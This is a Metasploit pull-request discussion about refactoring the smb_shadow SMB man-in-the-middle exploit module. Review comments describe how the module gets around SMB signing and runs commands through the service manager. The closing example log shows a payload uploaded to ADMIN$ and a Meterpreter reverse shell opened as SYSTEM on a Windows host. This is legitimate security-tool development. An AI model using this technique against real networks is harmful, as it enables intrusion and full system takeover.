Add MitmDispatcher to the smb_shadow module
rapid7/metasploit-framework pull request #16082
Opened 2022-01-21 05:50 UTC by usiegl00

The MitmDispatcher reduces code repetition and enables the use of standard RubySMB syntax.
I have noticed increased power draw when using the new dispatcher compared to the previous (less stateful) approach.

This depends on rapid7/ruby_smb#186.

See #15903 for the verification steps.

2022-01-26 10:53 UTC, adfoster-r7 commented on lib/msf/core/exploit/smb/mitm_dispatcher.rb
> +  class MitmDispatcher < RubySMB::Dispatcher::Base
We may want to rename/namespace this a bit, as there will be different types of 'man in the middle' smb exploits in framework in the future I'd imagine, i.e. for ntlm mitm etc. Will have to sync up with the team and decide on the naming convention that we'd want to follow :+1:

2022-01-26 22:54 UTC, usiegl00 commented on lib/msf/core/exploit/smb/mitm_dispatcher.rb
> +  class MitmDispatcher < RubySMB::Dispatcher::Base
Thanks! Let me know if I can help.

2022-01-27 15:28 UTC, jmartin-r7 requested changes

2022-01-27 15:28 UTC, jmartin-r7 commented on lib/msf/core/exploit/smb/mitm_dispatcher.rb
> +        @session_encrypt_data = false
These values are not used in this class, just instantiate the client with these values passed as keyword arguments.
```suggestion
```

2022-01-27 15:28 UTC, jmartin-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    client = RubySMB::Client.new(dispatcher, username: '', password: '')
By setting the client required values here you are explicitly defining what the client requirements are for this interaction.
```suggestion
    client = RubySMB::Client.new(dispatcher, smb1: false, smb2: true, smb3: false, always_encrypt: false,  username: '', password: '')
```

2022-01-27 15:28 UTC, jmartin-r7 commented on lib/msf/core/exploit/smb/mitm_dispatcher.rb
> +        @override_client_instance_variables = true
```suggestion
```

Not needed.

2022-01-27 15:28 UTC, jmartin-r7 commented on lib/msf/core/exploit/smb/mitm_dispatcher.rb
> +            smb2 = pkt.payload[4..-1]
This could introduce namespace confusion (shadowed variable scopes) with the instance variable `@smb2` although that issue does go away if the instance variables are removed as recommended.

2022-01-27 15:28 UTC, jmartin-r7 commented on lib/msf/core/exploit/smb/mitm_dispatcher.rb
> +  class MitmDispatcher < RubySMB::Dispatcher::Base
Maybe `ShadowSMB2MitmDispatcher`?

2022-01-28 00:24 UTC, adfoster-r7 commented on lib/msf/core/exploit/smb/shadow_mitm_dispatcher.rb
> +  class ShadowMitmDispatcher < RubySMB::Dispatcher::Base
Thanks! :+1:

2022-01-28 01:13 UTC, usiegl00 commented on lib/msf/core/exploit/smb/shadow_mitm_dispatcher.rb
> +  class ShadowMitmDispatcher < RubySMB::Dispatcher::Base
Using `ShadowSMB2MitmDispatcher` with Zietwerk would require the file name to be `shadow_s_m_b_2_mitm_dispatcher.rb`.
I decided to remove the `SMB2` part as we can add support for other smb versions in the future.

2022-01-31 14:29 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2022-01-31 16:08 UTC, jmartin-r7 commented
Sanity test failure is like due to gemset creation failures when pointing at a forked `ruby_smb` repo these should clear once that PR is landed and this PR is updated to utilized a released gem.

2022-04-05 10:35 UTC, cdelafuente-r7 reviewed
Thanks @usiegl00 for updating this. I tested it against the same environment and it works great now! I just left a few comments for you to review. Particularly, I have questions about the logic involved when the negotiated dialect is `0x300`.

2022-04-05 10:50 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +          unless smb_packet.dialects.min >= 0x300
In the registry there is `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters` and the key `MinSMB2Dialect` is a DWORD that can be set to `0x300`.
Source: https://techcommunity.microsoft.com/t5/storage-at-microsoft/controlling-smb-dialects/ba-p/860024

2022-04-05 10:51 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +              main_thread(packet: packet, dialect: 0x300, dstmac: getarp(packet.ip_header.ip_daddr))
At this point, any SMBv3 version will do in order to conduct the attack.
I just assumed that `0x300` is the least secure, which should be the right one to choose.

2022-04-05 10:52 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    if dialect >= 0x300
We are unable to sign the request, as we do not have the NTLM hash.
Using this technique, we can conduct the attack without disconnecting from the tree.

2022-04-05 11:10 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    if dialect >= 0x300
Due to the inability to make a signed `TreeConnectRequest`, we have to remove the file while staying on the same tree.
We have access to the `svcctl` job scheduler, so we can run a command as a service to delete the file.

2022-04-05 18:27 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +          unless smb_packet.dialects.min >= 0x300
That's awesome! I've learned a new thing today. Thanks!

2022-04-05 18:30 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +              main_thread(packet: packet, dialect: 0x300, dstmac: getarp(packet.ip_header.ip_daddr))
Would it be possible to document this in the code? This would help for future updates/maintenance.

2022-04-05 18:32 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    if dialect >= 0x300
Yeah, that's correct! Thanks for remembering me this! Also, that would be great to document this.

2022-04-05 18:33 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    if dialect >= 0x300
Great technique! Please, can you also add this as a comment in the code?

2022-04-05 18:55 UTC, jmartin-r7 approved these changes

2022-04-05 23:30 UTC, usiegl00 commented
This pr is ready to merge.
Thanks!

2022-04-06 09:43 UTC, cdelafuente-r7 commented
Thanks @usiegl00 ! I did a last test and everything looks good to me now. I'll go ahead and land it. Great job!

- Example output
```
msf6 exploit(windows/smb/smb_shadow) > options 

Module options (exploit/windows/smb/smb_shadow):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   ConfirmServerDialect  false            yes       Confirm the server supports an SMB2 dialect.
   DefangedMode          false            yes       Run in defanged mode
   DisableFwd            true             yes       Disable packet forwarding on port 445
   INTERFACE             eth0             yes       The name of the interface
   SHARE                 ADMIN$           yes       The share to connect to


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.33  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/smb_shadow) > 

[*] Started reverse TCP handler on 192.168.2.33:4444 
[+] INFO : Warming up...
[*] Self: 192.168.2.33 | ff:b2:11:3a:f3:33
[+] INFO : Packet forwarding on port 445 disabled.
[*] INFO : This module must be run alongside an arp spoofer / poisoner.
[*] INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \loZHNkHh.exe...
[*] Connecting to the Service Control Manager...
[*] Creating a new service...
[*] Closing service handle...
[*] Starting the service...
[*] Sending stage (175174 bytes) to 192.168.2.66
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \loZHNkHh.exe...
[*] Meterpreter session 1 opened (192.168.2.33:4444 -> 192.168.2.66:49676 ) at 2022-04-06 05:23:12 -0400

^C[*] Cleaning Up...
[+] INFO : Packet forwarding on port 445 reset.
[*] Cleaned Up.
[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(windows/smb/smb_shadow) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo 
Computer        : WIN2016SQL
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MYDOMAIN
Logged On Users : 8
Meterpreter     : x86/windows
```

2022-04-06 09:47 UTC, merged

2022-04-06 09:54 UTC, cdelafuente-r7 commented
# Release Notes
This updates the `shadow_mitm_dispatcher.rb` module by adding a new RubySMB Dispatcher. This allows a better integration with RubySMB and enables the use of all the feature provided by its client. Also, both SMBv2 and SMBv3 are now supported.

2022-04-06 10:09 UTC, adfoster-r7 commented
Awesome work! 🎉